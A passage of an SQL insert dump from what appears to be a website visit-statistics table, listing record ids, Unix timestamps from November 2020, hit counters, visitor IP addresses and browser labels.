44,1,1,0,0,'69.171.251.120','other'),(546274,1604873781,1,1,0,0,'66.220.149.26','other'),(546275,1604873825,1,1,0,0,'31.13.127.112','other'),(546276,1604874204,1,1,0,0,'91.196.178.124','chrome'),(546277,1604874218,1,1,0,0,'69.171.251.112','other'),(546278,1604874355,1,1,0,0,'173.252.127.14','other'),(546279,1604874384,1,1,0,0,'69.171.251.4','other'),(546280,1604874391,1,1,0,0,'91.196.178.131','chrome'),(546281,1604874468,1,1,0,0,'66.220.149.112','other'),(546282,1604874472,1,1,0,0,'94.45.129.197','other'),(546283,1604874750,1,1,0,0,'173.252.127.22','other'),(546284,1604874789,1,1,0,0,'69.171.251.10','other'),(546285,1604874968,1,1,0,0,'69.171.251.17','other'),(546286,1604874985,1,1,0,0,'31.13.127.4','other'),(546287,1604874996,1,1,0,0,'69.171.251.18','other'),(546288,1604875217,1,1,0,0,'66.220.149.32','other'),(546289,1604875218,1,1,0,0,'69.171.251.3','other'),(546290,1604875279,1,1,0,0,'31.13.127.24','other'),(546291,1604875368,1,0,1,0,'66.249.66.93',''),(546292,1604875369,1,1,0,0,'31.13.127.1','other'),(546293,1604875438,1,1,0,0,'69.171.251.26','other'),(546294,1604875443,1,1,0,0,'173.252.95.118','other'),(546295,1604875502,1,1,0,0,'173.252.127.5','other'),(546296,1604875689,1,1,0,0,'173.252.127.33','other'),(546297,1604875990,1,1,0,0,'31.13.127.5','other'),(546298,1604876020,1,1,0,0,'69.171.251.4','other'),(546299,1604876099,2,2,0,0,'66.220.149.24','other'),(546300,1604876181,1,1,0,0,'69.171.251.117','other'),(546301,1604876334,1,1,0,0,'69.171.251.118','other'),(546302,1604876426,1,1,0,0,'173.252.95.117','other'),(546303,1604876472,1,1,0,0,'66.220.149.7','other'),(546304,1604876758,1,1,0,0,'31.13.103.5','other'),(546305,1604877008,1,1,0,0,'31.13.103.116','other'),(546306,1604877059,1,1,0,0,'95.132.30.220','chrome'),(546307,1604877847,2,2,0,0,'69.171.251.21','other'),(546308,1604877864,1,1,0,0,'91.196.178.8','chrome'),(546309,1604877866,1,1,0,0,'69.171.251.15','other'),(546310,1604877867,1,1,0,0,'66.220.149.10','other'),(546311,1604877868,1,1,0,0,'69.171.251.25','other'),(546312,1604877869,1,1,0,0,'91.196.178.173','other'),(546313,1604878111,1,1,0,0,'173.252.127.12','other'),(546314,1604878125,1,1,0,0,'91.196.178.189','chrome'),(546315,1604878427,1,1,0,0,'31.13.103.112','other'),(546316,1604878929,1,1,0,0,'31.13.127.19','other'),(546317,1604879241,1,1,0,0,'69.171.251.120','other'),(546318,1604879679,1,1,0,0,'173.252.127.23','other'),(546319,1604879894,1,1,0,0,'173.252.127.21','other'),(546320,1604880151,1,1,0,0,'31.13.103.4','other'),(546321,1604880171,1,1,0,0,'91.196.178.169','chrome'),(546322,1604880305,1,1,0,0,'69.171.251.14','other'),(546323,1604880398,1,1,0,0,'66.220.149.26','other'),(546324,1604880531,1,1,0,0,'66.220.149.119','other'),(546326,1604880584,1,1,0,0,'173.252.127.16','other'),(546327,1604880607,1,1,0,0,'91.196.178.35','chrome'),(546328,1604880634,1,1,0,0,'173.252.127.27','other'),(546329,1604882117,1,1,0,0,'69.171.251.111','other'),(546330,1604882202,1,1,0,0,'128.124.80.82','chrome'),(546331,1604882228,1,1,0,0,'31.13.103.119','other'),(546332,1604882255,2,2,0,0,'69.171.251.12','other'),(546333,1604882262,1,1,0,0,'173.252.95.113','other'),(546334,1604882643,1,1,0,0,'91.196.178.44','chrome'),(546335,1604883079,1,1,0,0,'31.13.115.3','other'),(546336,1604883080,2,2,0,0,'31.13.115.7','other'),(546341,1604883893,1,1,0,0,'173.252.95.5','other'),(546342,1604883971,1,1,0,0,'173.252.127.113','other'),(546343,1604885106,1,1,0,0,'31.13.103.12','other'),(546344,1604886212,1,1,0,0,'69.171.251.24','other'),(546345,1604887632,1,1,0,0,'31.13.115.6','other'),(546346,1604887678,1,1,0,0,'31.13.115.18','other'),(546347,1604887691,1,1,0,0,'69.171.251.19','other'),(546348,1604887791,1,1,0,0,'66.220.149.29','other'),(546349,1604887831,1,1,0,0,'185.237.217.30','chrome'),(546350,1604888066,1,1,0,0,'69.171.251.120','other'),(546351,1604888748,1,1,0,0,'31.13.115.1','other'),(546352,1604888757,1,1,0,0,'69.171.251.2','other'),(546353,1604889344,1,1,0,0,'173.252.127.26','other'),(546354,1604889360,2,2,0,0,'185.237.217.30','chrome'),(546355,1604889379,2,2,0,0,'185.237.217.30','other'),(546356,1604889417,1,1,0,0,'173.252.127.8','other'),(546357,1604889541,1,1,0,0,'91.196.178.157','chrome'),(546358,1604891299,1,1,0,0,'69.171.251.23','other'),(546359,1604891385,1,1,0,0,'69.171.251.119','other'),(546360,1604891399,1,1,0,0,'31.13.115.19','other'),(546361,1604891433,1,1,0,0,'69.171.251.7','other'),(546362,1604892239,1,1,0,0,'66.220.149.20','other'),(546363,1604892439,1,1,0,0,'69.171.251.24','other'),(546364,1604892454,1,1,0,0,'77.111.247.180','chrome'),(546365,1604892773,1,1,0,0,'173.252.95.23','other'),(546366,1604892962,1,1,0,0,'69.171.251.23','other'),(546367,1604892966,1,1,0,0,'128.0.170.16','other'),(546368,1604893055,1,1,0,0,'91.196.179.33','other'),(546369,1604893131,1,1,0,0,'69.171.251.18','other'),(546370,1604893149,1,1,0,0,'185.237.217.5','chrome'),(546371,1604893372,1,1,0,0,'69.171.251.20','other'),(546372,1604893883,1,1,0,0,'69.171.251.7','other'),(546373,1604893884,1,1,0,0,'66.220.149.116','other'),(546374,1604894233,1,1,0,0,'173.252.95.112','other'),(546375,1604894506,1,1,0,0,'66.220.149.13','other'),(546376,1604894528,1,1,0,0,'69.171.251.19','other'),(546377,1604894537,1,1,0,0,'173.252.127.9','other'),(546378,1604894846,1,1,0,0,'69.171.251.5','other'),(546379,1604895061,1,1,0,0,'69.171.251.13','other'),(546380,1604895070,1,1,0,0,'66.220.149.25','other'),(546381,1604895146,1,1,0,0,'173.252.83.5','other'),(546382,1604895201,1,1,0,0,'69.171.251.6','other'),(546383,1604895211,1,1,0,0,'31.13.103.17','other'),(546384,1604895238,1,1,0,0,'91.196.178.14','chrome'),(546385,1604895289,1,1,0,0,'69.171.251.111','other'),(546386,1604895299,1,1,0,0,'91.196.178.45','chrome'),(546387,1604895351,1,1,0,0,'66.220.149.118','other'),(546388,1604895476,1,1,0,0,'31.13.115.12','other'),(546389,1604895477,1,1,0,0,'31.13.115.5','other'),(546390,1604895546,1,1,0,0,'173.252.127.14','other'),(546391,1604895636,1,1,0,0,'173.252.127.119','other'),(546392,1604895663,1,1,0,0,'91.196.178.88','chrome'),(546393,1604895692,1,1,0,0,'185.237.217.6','chrome'),(546394,1604895843,1,1,0,0,'69.171.251.12','other'),(546395,1604895883,1,1,0,0,'37.52.18.136','chrome'),(546396,1604895921,1,1,0,0,'69.171.251.118','other'),(546397,1604895922,1,1,0,0,'66.220.149.15','other'),(546398,1604896016,1,1,0,0,'69.171.251.24','other'),(546399,1604896464,1,1,0,0,'31.13.115.6','other'),(546400,1604896487,1,1,0,0,'37.55.151.107','chrome'),(546401,1604896490,1,1,0,0,'69.171.251.7','other'),(546402,1604896585,1,1,0,0,'91.196.178.123','chrome'),(546403,1604896680,1,1,0,0,'91.196.178.67','chrome'),(546404,1604896723,1,1,0,0,'173.252.127.22','other'),(546405,1604896926,1,1,0,0,'69.171.251.12','other'),(546406,1604896946,1,1,0,0,'37.73.179.229','chrome'),(546407,1604897310,1,1,0,0,'69.171.251.3','other'),(546408,1604897332,1,1,0,0,'91.196.178.182','chrome'),(546409,1604897346,1,1,0,0,'66.220.149.6','other'),(546410,1604897484,1,1,0,0,'91.196.178.46','chrome'),(546411,1604897542,1,1,0,0,'173.252.95.12','other'),(546412,1604897579,2,2,0,0,'69.171.251.11','other'),(546413,1604897647,1,1,0,0,'31.13.103.111','other'),(546414,1604897679,1,1,0,0,'31.13.115.17','other'),(546415,1604897680,1,1,0,0,'69.171.251.17','other'),(546416,1604897690,1,1,0,0,'37.73.128.74','chrome'),(546417,1604897758,2,2,0,0,'66.220.149.111','other'),(546418,1604897772,1,1,0,0,'173.252.127.1','other'),(546419,1604897791,1,1,0,0,'91.196.178.6','chrome'),(546420,1604897869,2,2,0,0,'31.13.103.24','other'),(546421,1604897872,1,1,0,0,'31.13.103.112','other'),(546422,1604897918,1,1,0,0,'66.220.149.24','other'),(546423,1604898090,1,1,0,0,'173.252.95.118','other'),(546424,1604898169,1,1,0,0,'94.153.7.143','chrome'),(546425,1604898209,1,1,0,0,'173.252.95.22','other'),(546426,1604898211,1,1,0,0,'173.252.127.5','other'),(546427,1604898241,1,1,0,0,'31.13.115.4','other'),(546428,1604898305,1,1,0,0,'91.196.177.163','chrome'),(546429,1604898322,1,1,0,0,'31.13.103.11','other'),(546430,1604898376,1,1,0,0,'31.13.103.116','other'),(546431,1604898439,1,1,0,0,'173.252.95.7','other'),(546432,1604898551,1,1,0,0,'31.13.103.12','other'),(546433,1604898577,1,1,0,0,'173.252.127.113','other'),(546434,1604898664,1,1,0,0,'66.220.149.26','other'),(546435,1604898814,1,1,0,0,'69.171.251.3','other'),(546436,1604898817,1,1,0,0,'91.196.178.176','chrome'),(546437,1604898836,1,1,0,0,'91.196.178.14','chrome'),(546438,1604898900,1,1,0,0,'46.211.70.135','chrome'),(546439,1604898943,1,1,0,0,'69.171.251.9','other'),(546440,1604898944,1,1,0,0,'173.252.95.113','other'),(546441,1604899004,1,1,0,0,'31.13.127.19','other'),(546442,1604899029,1,1,0,0,'31.13.103.22','other'),(546443,1604899215,1,1,0,0,'173.252.127.1','other'),(546444,1604899240,1,1,0,0,'66.220.149.14','other'),(546445,1604899323,2,2,0,0,'66.220.149.15','other'),(546446,1604899345,1,1,0,0,'178.95.244.155','chrome'),(546447,1604899483,1,1,0,0,'69.171.251.112','other'),(546448,1604899491,2,2,0,0,'69.171.251.17','other'),(546449,1604899528,1,1,0,0,'173.252.127.32','other'),(546450,1604899543,1,1,0,0,'173.252.95.18','other'),(546451,1604899544,2,2,0,0,'173.252.127.15','other'),(546452,1604899547,1,1,0,0,'31.13.103.21','other'),(546453,1604899659,1,1,0,0,'173.252.127.23','other'),(546454,1604899670,1,1,0,0,'173.252.95.8','other'),(546455,1604899857,1,1,0,0,'173.252.95.17','other'),(546456,1604900078,1,1,0,0,'31.13.127.12','other'),(546457,1604900085,1,1,0,0,'173.252.127.16','other'),(546458,1604900145,1,1,0,0,'69.171.251.24','other'),(546459,1604900181,1,1,0,0,'185.237.217.14','chrome'),(546460,1604900210,2,2,0,0,'66.220.149.14','other'),(546461,1604900250,1,1,0,0,'173.252.95.1','other'),(546462,1604900318,1,1,0,0,'31.13.103.1','other'),(546463,1604900355,1,1,0,0,'91.196.121.135','chrome'),(546464,1604900373,1,1,0,0,'69.171.251.10','other'),(546465,1604900400,1,1,0,0,'46.211.16.85','chrome'),(546466,1604900509,1,1,0,0,'66.220.149.32','other'),(546467,1604900516,1,1,0,0,'91.196.178.117','chrome'),(546468,1604900517,2,2,0,0,'66.220.149.28','other'),(546469,1604900694,1,1,0,0,'31.13.127.15','other'),(546470,1604900724,1,1,0,0,'130.180.218.219','chrome'),(546471,1604900840,1,1,0,0,'31.13.127.111','other'),(546472,1604900861,1,1,0,0,'66.220.149.10','other'),(546473,1604900863,1,1,0,0,'173.252.127.22','other'),(546475,1604900864,1,1,0,0,'109.86.149.101','chrome'),(546476,1604900876,1,1,0,0,'173.252.127.10','other'),(546477,1604900988,1,1,0,0,'69.171.251.12','other'),(546478,1604901030,1,1,0,0,'91.196.178.164','chrome'),(546479,1604901057,1,1,0,0,'69.171.251.7','other'),(546480,1604901169,1,1,0,0,'69.171.251.14','other'),(546481,1604901355,1,1,0,0,'173.252.127.17','other'),(546482,1604901377,1,1,0,0,'173.252.127.20','other'),(546483,1604901602,1,1,0,0,'69.171.251.13','other'),(546484,1604901604,1,1,0,0,'46.133.240.12','chrome'),(546485,1604901667,1,1,0,0,'66.220.149.21','other'),(546486,1604901784,1,1,0,0,'66.220.149.32','other'),(546487,1604901971,1,1,0,0,'173.252.127.30','other'),(546488,1604902031,1,1,0,0,'31.13.127.14','other'),(546489,1604902052,1,1,0,0,'37.73.118.99','chrome'),(546490,1604902056,1,1,0,0,'31.13.127.22','other'),(546491,1604902100,1,1,0,0,'66.220.149.19','other'),(546492,1604902240,1,1,0,0,'69.171.251.6','other'),(546493,1604902324,1,1,0,0,'31.13.127.111','other'),(546494,1604902414,1,1,0,0,'66.220.149.120','other'),(546495,1604902463,1,1,0,0,'69.171.251.14','other'),(546496,1604902471,1,1,0,0,'91.196.178.108','chrome'),(546497,1604902509,1,1,0,0,'66.220.149.30','other'),(546498,1604902543,1,1,0,0,'31.13.103.13','other'),(546499,1604902560,1,1,0,0,'69.171.251.21','other'),(546500,1604902811,1,1,0,0,'173.252.95.111','other'),(546501,1604902941,1,1,0,0,'173.252.127.28','other'),(546502,1604902959,1,1,0,0,'94.153.66.11','chrome'),(546503,1604902986,1,1,0,0,'69.171.251.16','other'),(546504,1604903113,1,1,0,0,'91.196.178.57','other'),(546505,1604903169,1,1,0,0,'69.171.251.7','other'),(546506,1604903228,2,2,0,0,'66.220.149.8','other'),(546507,1604903298,3,3,0,0,'91.196.177.253','firefox'),(546508,1604903380,1,1,0,0,'69.171.251.117','other'),(546509,1604903410,1,1,0,0,'173.252.127.10','other'),(546510,1604903478,1,1,0,0,'185.237.217.14','chrome'),(546511,1604903543,1,1,0,0,'31.13.103.17','other'),(546512,1604903548,1,1,0,0,'31.13.127.113','other'),(546513,1604903604,1,1,0,0,'37.73.8.112','chrome'),(546514,1604903631,1,1,0,0,'69.171.251.3','other'),(546515,1604903670,1,1,0,0,'66.220.149.27','other'),(546516,1604904019,1,1,0,0,'69.171.251.12','other'),(546517,1604904063,1,1,0,0,'69.171.251.10','other'),(546518,1604904133,1,1,0,0,'173.252.127.112','other'),(546519,1604904134,1,1,0,0,'173.252.127.118','other'),(546520,1604904135,1,1,0,0,'66.220.149.113','other'),(546521,1604904141,1,1,0,0,'91.196.178.8','chrome'),(546522,1604904148,1,1,0,0,'46.211.11.118','other'),(546523,1604904165,1,1,0,0,'31.13.127.13','other'),(546524,1604904232,1,1,0,0,'88.155.114.120','chrome'),(546525,1604904256,2,2,0,0,'173.252.95.17','other'),(546526,1604904277,1,1,0,0,'173.252.127.2','other'),(546527,1604904284,1,1,0,0,'69.171.251.116','other'),(546528,1604904290,1,1,0,0,'37.73.153.132','other'),(546529,1604904316,1,1,0,0,'91.196.178.153','chrome'),(546530,1604904331,1,1,0,0,'173.252.95.5','other'),(546531,1604904505,1,1,0,0,'66.220.149.3','other'),(546532,1604904592,1,1,0,0,'82.207.123.107','chrome'),(546533,1604904749,1,1,0,0,'69.171.251.9','other'),(546534,1604904757,1,1,0,0,'185.237.217.15','chrome'),(546535,1604904797,1,1,0,0,'173.252.127.3','other'),(546536,1604904903,1,1,0,0,'31.13.127.117','other'),(546537,1604904916,1,1,0,0,'31.13.127.23','other'),(546538,1604904925,1,1,0,0,'69.171.251.23','other'),(546539,1604904935,1,1,0,0,'37.73.119.186','chrome'),(546540,1604905059,1,1,0,0,'69.171.251.120','other'),(546541,1604905097,1,1,0,0,'31.13.103.9','other'),(546542,1604905194,1,1,0,0,'66.220.149.22','other'),(546543,1604905227,1,1,0,0,'66.220.149.26','other'),(546544,1604905265,1,1,0,0,'69.171.251.21','other'),(546545,1604905372,1,1,0,0,'173.252.127.119','other'),(546546,1604905461,1,1,0,0,'69.171.251.10','other'),(546547,1604905612,1,1,0,0,'69.171.251.13','other'),(546548,1604905639,1,1,0,0,'91.196.178.11','chrome'),(546549,1604905663,1,1,0,0,'69.171.251.6','other'),(546550,1604905834,1,1,0,0,'66.220.149.112','other'),(546551,1604905879,1,1,0,0,'173.252.95.23','other'),(546552,1604905904,1,1,0,0,'31.13.127.9','other'),(546553,1604905919,1,1,0,0,'69.171.251.112','other'),(546554,1604905921,1,1,0,0,'173.252.127.11','other'),(546555,1604906050,1,1,0,0,'46.29.224.60','chrome'),(546556,1604906203,1,1,0,0,'69.171.251.117','other'),(546557,1604906276,1,1,0,0,'173.252.95.15','other'),(546558,1604906337,1,1,0,0,'69.171.251.12','other'),(546559,1604906581,1,1,0,0,'69.171.251.25','other'),(546560,1604906582,1,1,0,0,'66.220.149.18','other'),(546561,1604906625,1,1,0,0,'69.171.251.23','other'),(546562,1604906657,1,1,0,0,'178.92.153.98','chrome'),(546563,1604906693,2,2,0,0,'69.171.251.16','other'),(546564,1604906753,1,1,0,0,'66.220.149.11','other'),(546565,1604906758,1,1,0,0,'173.252.127.116','other'),(546566,1604906790,1,1,0,0,'46.133.125.137','chrome'),(546567,1604906830,1,1,0,0,'31.13.127.118','other'),(546568,1604906845,1,1,0,0,'66.220.149.30','other'),(546569,1604906912,1,1,0,0,'69.171.251.20','other'),(546570,1604906924,1,1,0,0,'173.252.127.119','other'),(546571,1604907131,1,1,0,0,'173.252.95.17','other'),(546572,1604907317,1,1,0,0,'69.171.251.119','other'),(546573,1604907340,1,1,0,0,'66.220.149.5','other'),(546574,1604907436,1,1,0,0,'69.171.251.10','other'),(546575,1604907492,1,1,0,0,'173.252.127.11','other'),(546576,1604907713,1,1,0,0,'91.196.177.110','chrome'),(546577,1604907721,1,1,0,0,'66.220.149.32','other'),(546578,1604907724,1,1,0,0,'91.196.121.135','chrome'),(546579,1604908019,1,1,0,0,'46.211.36.123','chrome'),(546580,1604908031,1,1,0,0,'173.252.127.30','other'),(546581,1604908055,1,1,0,0,'173.252.95.17','other'),(546582,1604908232,1,1,0,0,'66.220.149.29','other'),(546583,1604908312,1,1,0,0,'69.171.251.14','other'),(546584,1604908328,1,1,0,0,'66.220.149.116','other'),(546585,1604908347,1,1,0,0,'173.252.127.28','other'),(546586,1604908440,1,1,0,0,'66.220.149.119','other'),(546587,1604908752,1,1,0,0,'69.171.251.21','other'),(546588,1604908850,1,1,0,0,'69.171.251.111','other'),(546589,1604908851,1,1,0,0,'91.196.178.186','chrome'),(546590,1604908984,1,1,0,0,'69.171.251.25','other'),(546591,1604909094,1,1,0,0,'69.171.251.119','other'),(546592,1604909102,1,1,0,0,'173.252.95.15','other'),(546593,1604909138,1,1,0,0,'66.220.149.17','other'),(546594,1604909139,1,1,0,0,'66.220.149.5','other'),(546595,1604909249,1,1,0,0,'37.73.8.112','chrome'),(546596,1604909266,1,1,0,0,'66.220.149.27','other'),(546597,1604909322,1,1,0,0,'91.196.177.34','chrome'),(546598,1604909450,1,1,0,0,'173.252.127.27','other'),(546599,1604909508,1,1,0,0,'173.252.127.2','other'),(546600,1604909520,1,1,0,0,'173.252.127.111','other'),(546601,1604909628,1,1,0,0,'173.252.95.4','other'),(546602,1604909727,1,1,0,0,'31.13.127.4','other'),(546603,1604909826,1,1,0,0,'69.171.251.18','other'),(546604,1604909828,1,1,0,0,'66.220.149.116','other'),(546605,1604909837,1,1,0,0,'91.196.177.151','chrome'),(546606,1604909882,1,1,0,0,'69.171.251.117','other'),(546607,1604909903,1,1,0,0,'94.153.228.86','chrome'),(546608,1604909907,2,2,0,0,'69.171.251.26','other'),(546609,1604909909,1,1,0,0,'91.196.178.169','chrome'),(546610,1604910000,1,1,0,0,'173.252.95.21','other'),(546611,1604910067,1,1,0,0,'31.13.103.23','other'),(546612,1604910165,1,1,0,0,'66.220.149.119','other'),(546613,1604910186,1,1,0,0,'46.211.59.147','chrome'),(546614,1604910431,1,1,0,0,'69.171.251.14','other'),(546615,1604910560,1,1,0,0,'46.211.11.118','other'),(546616,1604910618,1,1,0,0,'31.13.127.22','other'),(546617,1604910682,1,1,0,0,'185.11.31.117','chrome'),(546618,1604910905,1,1,0,0,'69.171.251.13','other'),(546619,1604910910,1,1,0,0,'31.13.127.20','other'),(546620,1604911028,1,1,0,0,'69.171.251.117','other'),(546621,1604911149,1,1,0,0,'173.252.127.20','other'),(546622,1604911460,1,1,0,0,'69.171.251.22','other'),(546623,1604911542,1,1,0,0,'185.237.217.22','chrome'),(546624,1604911586,1,1,0,0,'31.13.127.9','other'),(546625,1604911671,1,1,0,0,'69.171.251.1','other'),(546626,1604911709,1,1,0,0,'128.124.113.194','chrome'),(546627,1604911721,1,1,0,0,'66.220.149.5','other'),(546628,1604911913,1,1,0,0,'66.220.149.13','other'),(546629,1604911922,2,2,0,0,'69.171.251.8','other'),(546630,1604911960,1,1,0,0,'173.252.127.34','other'),(546631,1604912002,1,1,0,0,'91.196.178.180','chrome'),(546632,1604912251,1,1,0,0,'173.252.95.116','other'),(546633,1604912439,1,1,0,0,'31.13.127.17','other'),(546634,1604912464,1,1,0,0,'69.171.251.25','other'),(546635,1604912468,1,1,0,0,'173.252.127.111','other'),(546636,1604912510,1,1,0,0,'66.220.149.20','other'),(546637,1604912548,1,1,0,0,'173.252.95.14','other'),(546638,1604912579,1,1,0,0,'69.171.251.111','other'),(546639,1604912587,1,1,0,0,'31.13.103.10','other'),(546640,1604912590,1,1,0,0,'83.189.217.161','other'),(546641,1604912602,1,1,0,0,'31.13.127.10','other'),(546642,1604912622,1,1,0,0,'69.171.251.119','other'),(546643,1604912725,1,1,0,0,'173.252.127.4','other'),(546644,1604912873,1,1,0,0,'173.252.95.6','other'),(546645,1604913070,1,1,0,0,'69.171.251.120','other'),(546646,1604913283,1,1,0,0,'69.171.251.13','other'),(546647,1604913284,1,1,0,0,'46.211.0.211','chrome'),(546648,1604913315,1,1,0,0,'91.196.178.151','chrome'),(546649,1604913349,1,1,0,0,'173.252.127.14','other'),(546650,1604913409,1,1,0,0,'173.252.127.117','other'),(546651,1604913445,1,1,0,0,'95.158.42.54','chrome'),(546652,1604913462,1,1,0,0,'69.171.251.9','other'),(546653,1604913465,1,1,0,0,'66.220.149.116','other'),(546654,1604913515,1,1,0,0,'66.220.149.27','other'),(546655,1604913593,2,2,0,0,'173.252.95.19','other'),(546656,1604913667,1,1,0,0,'91.196.178.98','chrome'),(546657,1604913728,1,1,0,0,'31.13.127.24','other'),(546658,1604913826,1,1,0,0,'69.171.251.27','other'),(546659,1604913912,1,1,0,0,'173.252.127.112','other'),(546660,1604913916,1,1,0,0,'66.220.149.21','other'),(546661,1604914086,1,1,0,0,'31.13.127.118','other'),(546662,1604914096,1,1,0,0,'91.196.178.161','chrome'),(546663,1604914104,1,1,0,0,'173.252.127.116','other'),(546664,1604914262,1,1,0,0,'173.252.95.117','other'),(546665,1604914280,1,1,0,0,'69.171.251.17','other'),(546666,1604914297,1,1,0,0,'91.196.178.14','chrome'),(546667,1604914613,1,1,0,0,'173.252.95.1','other'),(546668,1604914625,1,1,0,0,'69.171.251.10','other'),(546669,1604914852,1,1,0,0,'66.220.149.32','other'),(546670,1604914971,1,1,0,0,'69.171.251.21','other'),(546671,1604915191,1,1,0,0,'69.171.251.15','other'),(546672,1604915200,1,1,0,0,'173.252.95.11','other'),(546673,1604915259,1,1,0,0,'69.171.251.9','other'),(546674,1604915260,1,1,0,0,'173.252.127.26','other'),(546675,1604915300,1,1,0,0,'66.220.149.17','other'),(546676,1604915494,1,1,0,0,'31.13.127.10','other'),(546677,1604915502,1,1,0,0,'31.13.127.17','other'),(546678,1604915611,1,1,0,0,'31.13.127.15','other'),(546679,1604915685,1,1,0,0,'31.13.103.113','other'),(546680,1604915719,1,1,0,0,'66.220.149.3','other'),(546681,1604915826,1,1,0,0,'69.171.251.3','other'),(546682,1604915833,1,1,0,0,'178.133.166.22','chrome'),(546683,1604915843,1,1,0,0,'173.252.95.15','other'),(546684,1604915915,1,1,0,0,'69.171.251.4','other'),(546685,1604915928,1,1,0,0,'69.171.251.25','other'),(546686,1604916017,1,1,0,0,'173.252.95.23','other'),(546687,1604916244,1,1,0,0,'173.252.127.23','other'),(546688,1604916254,1,1,0,0,'109.81.212.26','other'),(546689,1604916529,1,1,0,0,'69.171.251.9','other'),(546690,1604916547,1,1,0,0,'66.220.149.25','other'),(546691,1604916697,1,1,0,0,'69.171.251.26','other'),(546692,1604916820,1,1,0,0,'66.220.149.11','other'),(546693,1604916935,1,1,0,0,'31.13.127.11','other'),(546694,1604916959,1,1,0,0,'173.252.95.1','other'),(546695,1604917036,1,1,0,0,'69.171.251.23','other'),(546696,1604917151,1,1,0,0,'66.220.149.116','other'),(546697,1604917621,1,1,0,0,'173.252.127.38','other'),(546698,1604917660,1,1,0,0,'173.252.127.24','other'),(546699,1604917732,1,1,0,0,'69.171.251.120','other'),(546700,1604917733,2,2,0,0,'66.220.149.23','other'),(546701,1604917774,1,1,0,0,'69.171.251.22','other'),(546702,1604918005,1,1,0,0,'128.124.202.183','chrome'),(546703,1604918047,1,1,0,0,'173.252.127.111','other'),(546704,1604918237,1,1,0,0,'69.171.251.117','other'),(546705,1604918238,1,1,0,0,'31.13.127.10','other'),(546706,1604918594,1,1,0,0,'31.13.103.24','other'),(546707,1604918683,1,1,0,0,'69.171.251.15','other'),(546708,1604918699,1,1,0,0,'91.196.178.18','chrome'),(546709,1604918851,1,1,0,0,'173.252.127.3','other'),(546710,1604918877,1,1,0,0,'173.252.95.116','other'),(546711,1604919019,1,1,0,0,'66.220.149.120','other'),(546712,1604919067,1,1,0,0,'91.196.178.174','other'),(546713,1604919361,1,1,0,0,'69.171.251.21','other'),(546714,1604919366,1,1,0,0,'88.155.43.116','other'),(546715,1604919854,1,1,0,0,'31.13.127.3','other'),(546716,1604919868,1,1,0,0,'193.108.51.254','other'),(546717,1604919888,1,1,0,0,'31.13.103.118','other'),(546718,1604919890,1,1,0,0,'46.211.38.58','chrome'),(546719,1604919896,1,1,0,0,'46.211.21.82','chrome'),(546720,1604919914,1,1,0,0,'69.171.251.7','other'),(546721,1604920054,1,1,0,0,'173.252.127.30','other'),(546722,1604920533,1,1,0,0,'173.252.127.20','other'),(546723,1604920635,1,1,0,0,'66.220.149.20','other'),(546724,1604920644,2,2,0,0,'69.171.251.14','other'),(546725,1604920768,1,1,0,0,'69.171.251.26','other'),(546726,1604920772,1,1,0,0,'69.171.251.11','other'),(546727,1604921010,1,1,0,0,'69.171.251.118','other'),(546728,1604921115,1,1,0,0,'31.13.127.3','other'),(546729,1604921144,1,1,0,0,'91.196.178.14','chrome'),(546730,1604921271,1,1,0,0,'31.13.127.116','other'),(546731,1604921295,1,1,0,0,'69.171.251.25','other'),(546733,1604921305,1,1,0,0,'173.252.127.119','other'),(546734,1604921476,1,1,0,0,'66.220.149.1','other'),(546735,1604921477,1,1,0,0,'173.252.107.17','other'),(546736,1604921478,1,1,0,0,'69.171.251.23','other'),(546738,1604921492,1,1,0,0,'94.153.48.232','chrome'),(546739,1604921530,1,1,0,0,'173.252.95.21','other'),(546740,1604921811,1,1,0,0,'31.13.127.18','other'),(546741,1604921825,1,1,0,0,'69.171.251.21','other'),(546742,1604921827,1,1,0,0,'130.180.209.189','chrome'),(546743,1604921993,1,1,0,0,'173.252.87.119','other'),(546744,1604922166,1,1,0,0,'173.252.95.5','other'),(546745,1604922210,1,1,0,0,'69.171.251.19','other'),(546746,1604922250,1,1,0,0,'69.171.251.17','other'),(546747,1604922264,1,1,0,0,'31.43.134.169','chrome'),(546748,1604922818,1,1,0,0,'69.171.251.26','other'),(546749,1604922839,1,1,0,0,'31.13.127.13','other'),(546750,1604923017,1,1,0,0,'66.220.149.23','other'),(546751,1604923084,1,1,0,0,'185.237.217.30','other'),(546752,1604923153,1,1,0,0,'31.13.103.10','other'),(546753,1604923178,1,1,0,0,'173.252.127.1','other'),(546754,1604923191,1,1,0,0,'69.171.251.23','other'),(546755,1604923346,1,1,0,0,'173.252.127.21','other'),(546756,1604923392,2,2,0,0,'69.171.251.7','other'),(546758,1604923429,1,1,0,0,'173.252.95.3','other'),(546759,1604923592,1,1,0,0,'91.196.178.88','chrome'),(546760,1604923700,1,1,0,0,'91.196.178.14','chrome'),(546761,1604923725,1,1,0,0,'69.171.251.112','other'),(546762,1604923742,1,1,0,0,'109.248.165.78','chrome'),(546763,1604924074,1,1,0,0,'66.220.149.26','other'),(546764,1604924121,1,1,0,0,'31.13.103.14','other'),(546765,1604924217,1,1,0,0,'31.13.127.11','other'),(546766,1604924503,1,1,0,0,'66.220.149.14','other'),(546767,1604924516,1,1,0,0,'69.171.251.118','other'),(546768,1604924989,1,1,0,0,'66.220.149.25','other'),(546770,1604925087,1,1,0,0,'31.13.127.118','other'),(546771,1604925166,1,1,0,0,'69.171.251.13','other'),(546772,1604925219,1,1,0,0,'173.252.127.32','other'),(546773,1604925227,1,1,0,0,'37.53.111.136','chrome'),(546774,1604925602,1,1,0,0,'66.220.149.19','other'),(546775,1604925712,1,1,0,0,'31.13.103.15','other'),(546776,1604925792,1,1,0,0,'69.171.251.17','other'),(546777,1604925810,1,1,0,0,'94.153.48.118','chrome'),(546778,1604925822,1,1,0,0,'173.252.127.14','other'),(546779,1604925936,1,1,0,0,'31.13.127.8','other'),(546780,1604926032,1,1,0,0,'46.211.41.41','chrome'),(546781,1604926039,1,1,0,0,'31.13.127.1','other'),(546782,1604926061,1,1,0,0,'173.252.95.19','other'),(546783,1604926376,1,1,0,0,'66.220.149.24','other'),(546784,1604926862,1,1,0,0,'173.252.127.116','other'),(546785,1604927071,1,1,0,0,'69.171.251.10','other'),(546786,1604927081,1,1,0,0,'173.252.95.10','other'),(546787,1604927089,1,1,0,0,'37.73.196.51','other'),(546788,1604927437,1,1,0,0,'31.13.127.6','other'),(546789,1604927451,1,1,0,0,'31.13.103.117','other'),(546790,1604927631,1,1,0,0,'173.252.127.31','other'),(546791,1604927742,1,1,0,0,'69.171.251.9','other'),(546792,1604927917,1,1,0,0,'69.171.251.19','other'),(546793,1604927992,1,1,0,0,'66.220.149.2','other'),(546794,16